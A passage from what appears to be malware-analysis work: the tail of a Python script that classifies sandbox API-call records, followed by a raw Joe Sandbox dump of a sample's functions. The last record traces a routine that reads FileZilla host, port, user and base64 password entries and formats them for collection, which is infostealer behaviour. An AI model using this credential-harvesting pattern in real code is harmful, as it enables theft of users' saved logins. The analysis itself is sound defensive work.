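    "directory_walk": ["FindFirstFileA", "FindNextFileA"],
}
# dwFlags bits of CryptStringToBinaryA / CryptBinaryToStringA, from wincrypt.h.
CRYPT_STRING_FLAGS = {0x00000001: "CRYPT_STRING_BASE64", 0x40000000: "CRYPT_STRING_NOCRLF"}


def parse_records(text):
    """One dict per function; a record starts at an 'APIs' line. Callee lines are skipped."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "offset": None, "pe": None, "opcode_id": None}
            records.append(cur)
            continue
        if cur is None or "Part of subcall function" in line:
            continue
        if m := API_RE.match(line):
            name, dll, args, ref = m.groups()
            cur["apis"].append({"api": name, "dll": dll, "args": args.split(",") if args else [], "ref": ref})
            continue
        if m := OFFSET_RE.search(line):
            cur["offset"], cur["pe"] = m.group(1), m.group(2) == "true"
        elif m := OPCODE_RE.search(line):
            cur["opcode_id"] = m.group(1)
    return records


def is_subsequence(needle, haystack):
    it = iter(haystack)  # each needle item must appear later than the previous one
    return all(any(x == y for y in it) for x in needle)


def classify(record):
    seq = [c["api"] for c in record["apis"]]
    return sorted(tag for tag, sig in SIGNATURES.items() if is_subsequence(sig, seq))


def crypt_string_flags(call):
    """Decode dwFlags (third argument) of the Crypt*String* calls; '?' means unrecovered."""
    if not call["api"].startswith(("CryptStringToBinary", "CryptBinaryToString")):
        return []
    try:
        value = int(call["args"][2], 16)
    except (IndexError, ValueError):
        return []
    return [name for bit, name in CRYPT_STRING_FLAGS.items() if value & bit]


def pair_by_opcode_id(records):
    """Opcode IDs present at more than one dump offset: one function body mapped twice."""
    groups = defaultdict(set)
    for r in records:
        if r["opcode_id"] and r["offset"]:
            groups[r["opcode_id"]].add(r["offset"])
    return {oid: sorted(offs) for oid, offs in groups.items() if len(offs) > 1}


def triage(text):
    records = parse_records(text)
    findings = [{"offset": r["offset"], "first_ref": r["apis"][0]["ref"] if r["apis"] else None,
                 "tags": classify(r),
                 "crypt_flags": sorted({f for c in r["apis"] for f in crypt_string_flags(c)})}
                for r in records]
    return findings, pair_by_opcode_id(records)
```

Calling triage(SAMPLE) returns one finding per record (offset, first call site, matched tags, decoded flags) plus the Opcode IDs shared between the 00400000 and 04840000 dumps. Subcall lines are deliberately ignored so that a signature matches the function that issues the calls and not every caller above it; the lstrcpy/lstrcat helpers reached through subcalls would otherwise pollute every record. To run it over a full report, paste the records section into SAMPLE or read it from a file.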
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                              • Instruction ID: d6c40d9d13792f1c9433a2dc1382a9bb71ac176a5b3618eb0724e890a4fa95f9
                                              • Opcode Fuzzy Hash: b2efdfdec92dc9210b77844374be35780428ca2a8b219193cf7102a7cd532072
                                              • Instruction Fuzzy Hash: C282E175A00F448FD3A5CF29C880BA2B7E1BF59300F548A2ED9EB8B651EB70B545CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                              • Instruction ID: b144f9d2b25ea725f48f3cf24d54d37376ecb209a950d7776c0d193cd338f0e0
                                              • Opcode Fuzzy Hash: 54423d445fcc40934ee9b0b29497ac89ac093eac2bdc85596de5d7ecbfa78b8c
                                              • Instruction Fuzzy Hash: BA32D671E002198FDB14CF58C8847EFB7A2BB8A314F148B29D5A9EB391D734A9458BD1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                              • Instruction ID: e47c77aa1ec196dfe9c73f5d218dbb40117b9f999130da14d38534a28253b8b2
                                              • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                              • Instruction Fuzzy Hash: FE4278716046458FC725FF19C490626BBE2BF89304FA88E6ED486CB792D735F885CB81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                              • Instruction ID: 3f2227f2dd9ec2c323f77e0480198611c67a8d649559324876af354539cbbd50
                                              • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                              • Instruction Fuzzy Hash: 4D020571E0021A8FDB15CE69C8806AEB7E2AF9A344F158B2AE855F7350E771BD4187D0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                              • Instruction ID: ebe17e44fb808028ff09c3222f1f40016d2a2084f563748e66f5f9f2a12e7f02
                                              • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                              • Instruction Fuzzy Hash: BEF17BB220C6914BC71D9A1894B08BD7FD25FA9101F0E8AADFDD71F393D924EA01DB61
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                              • Instruction ID: d43fd71a00ebaa0820372a669288a60e975bc08b456d153fc766c2492d6331a7
                                              • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                              • Instruction Fuzzy Hash: 5AD18673F106294BEB08CE99DC913ADB6E2E7D8350F19463ED916E7381D6B89D0187D0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                              • Instruction ID: 88f08d199d8a42430f25441bc9c42292788ede06a30bbb55c43d03abc71e28f7
                                              • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                              • Instruction Fuzzy Hash: 82028B74E00A588FCF16CFA8C4905EDBBF6FF89310F588559E899AB355C730A951CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                              • Instruction ID: e9b7ecc7f99f2dc6f466675928bc19c05528abbd5964063daf066426383291b8
                                              • Opcode Fuzzy Hash: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
                                              • Instruction Fuzzy Hash: 8C021375E00A198FCF15CF98D4809ADB7B6FF88310F258669E849AB354D731AA91CF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                              • Instruction ID: 4ffc0905b735c12b0e27498ea62fb4c99e9ce2ccc620fdef0523dee0e9a0ae54
                                              • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                              • Instruction Fuzzy Hash: 8AC160B6E29B914BD3138B3DD8422A5F754AFE7190F15D72FFDE472A42FB20A2814244
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                              • Instruction ID: 25293528a5ac77f5ea5967dc09958c29780c52043f478568c9f7fd3af059edc0
                                              • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                              • Instruction Fuzzy Hash: E9B14B76D042599FEB11EF68C4943FEBFB2AF42304F098A59C444EB242E7B46995C7A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                              • Instruction ID: f53aaaa815b8df75d0679c0a1cfcbed3bb5489b5187ec0b8b0956696cc90c0c5
                                              • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                              • Instruction Fuzzy Hash: F0D14670600B40CFE729CF29C484B66B7E0BB49704F148A2ED88B8BB51E7B6F455CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                              • Instruction ID: 66120233b49f672806d450cd9193795952a0bf200dbeb9bd4269a053370752c0
                                              • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                              • Instruction Fuzzy Hash: 6BB18272A083115BD318CF25C45076BF7E2EFC8310F1ACA3EA899D7791D778E9459A82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                              • Instruction ID: ae94d9d1fac71d1f68834edc8056c26e253f1b080709607d7b8a232ca8749a60
                                              • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                              • Instruction Fuzzy Hash: D9B1A372A083115BD308CF25C45136BF7E2EFC8710F1ACA3EE899D7291D779E9419A82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                              • Instruction ID: dbb0da1120e295de86cf66677964907f7b5be8e9f44ea499d054b03ca52dc38b
                                              • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                              • Instruction Fuzzy Hash: D7B11771A197118FD706EE3DC491225F7E1AFD6280F50CB2EE895B7762EB31E8818740
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                              • Instruction ID: 601872aaf2cd96b99ae99b516af3fd7c64e78c5e5cac13fd5a1d0e6340e296cf
                                              • Opcode Fuzzy Hash: 5185ef17974cb1e7938c1049dfbfd6043ba02edff510d25e23a45b9cf056c98f
                                              • Instruction Fuzzy Hash: 2491D571F002158FDF14CF68C8A8BFA77A2AB56344F194A65D999EF382E261FC0187D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                              • Instruction ID: 5fcf684917cdb0f8e8139698455e518fa1932c1726cdc0f164267efc8416cbfb
                                              • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                              • Instruction Fuzzy Hash: E1B18D31650608DFD719DF28C48ABA57BE0FF45366F298A5CE999CF2A1C335E981CB40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                              • Instruction ID: c54902496169c1d31f963678d47626a52a81f41e05787f6ed73c226709260e08
                                              • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                              • Instruction Fuzzy Hash: CAC14A75A04B1A8FC715DF28C08045AB3F2FF88350F258A6DE8999B721D731E996CF81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                              • Instruction ID: 9fe3b9fceb38fbdc1767d41d08c8065244ceb3c6526269ec1977df8e87ad4b0d
                                              • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                              • Instruction Fuzzy Hash: A3917A319287905AFB168B3CCC417BABB94FFD6350F00CB1AF998B2491FBB1A5819345
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                              • Instruction ID: ad524ed7ab76404d57f5ed2669e2e235062a2f0a5b82d047ac359191e4b3ceed
                                              • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                              • Instruction Fuzzy Hash: 9DA1E6B2A10A19DFEB19CF55CCC1A9EBBA1FB48314F14862ED45AEB390D374A544CF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                              • Instruction ID: 79cd2e955c5569dc42d818a22869f39a61b7881600f41f9be74de0da23147481
                                              • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                              • Instruction Fuzzy Hash: C6A16D72A083519BD308CF25C89075BF7E2EFC8710F1ACA3DE8999B654D774E9419B82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                              • Instruction ID: 3262e84611de454d3ef6427cc991d646f79a4c3eacbb8f6a533a943d6c2925bb
                                              • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                              • Instruction Fuzzy Hash: 97515972E09BD989C7068B7944502EEBFB21FE6104F1E839EC4D85F382C2756289C3E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C23000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2c23000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction ID: 276ce4146e93015b8fd58be36e96b81ad1214dd7d4cf5fdc73cb6fc39a9f015a
                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction Fuzzy Hash: C211A1B2340110AFDB44DF55DCC1FA673EAFB89760B1980A5ED08CB312DA79E806CB60
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction ID: 6fb2d71d34c6a1b7097446b24df2e8132588851feaede00a5a570a221b622c74
                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction Fuzzy Hash: BE018476A006188FDB21CF24C804BAB33B5EBC6215F554AA5EA06D7241E774B9458B90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                              • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                              • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                              • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                              • Instruction ID: 4d80f86181818724da15ab596f0ea3b3d0b3b8f5b3ca866f257867a4524cc90b
                                              • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                              • Instruction Fuzzy Hash: F971F631410B009BE7727B35DD13E4977A17F22345F104F369AF6A0DF09AA278679752
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • strtok_s.MSVCRT ref: 0041047B
                                              • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
                                              • lstrlenA.KERNEL32(00000000), ref: 004104F3
                                                • Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
                                                • Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93
                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
                                              • lstrlenA.KERNEL32(00000000), ref: 0041053D
                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
                                              • lstrlenA.KERNEL32(00000000), ref: 00410587
                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
                                              • lstrlenA.KERNEL32(00000000), ref: 004105D5
                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
                                              • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
                                              • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
                                              • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
                                              • lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
                                              • lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
                                              • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
                                              • lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
                                              • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
                                              • lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
                                              • lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
                                              • strtok_s.MSVCRT ref: 004107D9
                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
